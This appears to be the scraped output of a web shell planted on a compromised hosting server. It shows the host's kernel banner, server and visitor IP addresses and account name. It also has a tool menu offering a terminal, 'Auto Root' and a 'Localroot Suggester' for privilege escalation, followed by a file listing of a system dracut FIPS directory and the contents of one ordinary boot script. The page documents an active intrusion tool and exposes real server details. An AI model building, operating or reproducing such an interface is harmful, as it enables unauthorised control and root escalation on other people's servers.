Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
dracut /
modules.d /
01fips /
Delete
Unzip
Name
Size
Permission
Date
Action
fips-boot.sh
490
B
-rwxr-xr-x
2025-06-11 16:03
fips-load-crypto.sh
443
B
-rw-r--r--
2025-06-11 16:03
fips-noboot.sh
472
B
-rwxr-xr-x
2025-06-11 16:03
fips.sh
8.61
KB
-rwxr-xr-x
2025-06-11 16:03
module-setup.sh
1.94
KB
-rwxr-xr-x
2025-06-11 16:03
openssl.cnf
136
B
-rw-r--r--
2025-06-11 16:03
Save
Rename
#!/usr/bin/sh type getarg > /dev/null 2>&1 || . /lib/dracut-lib.sh if ! fipsmode=$(getarg fips) || [ "$fipsmode" = "0" ]; then rm -f -- /etc/modprobe.d/fips.conf > /dev/null 2>&1 elif [ -z "$fipsmode" ]; then die "FIPS mode have to be enabled by 'fips=1' not just 'fips'" elif getarg boot= > /dev/null; then . /sbin/fips.sh fips_info "fips-boot: start" if mount_boot; then do_fips || die "FIPS integrity test failed" fi fips_info "fips-boot: done!" fi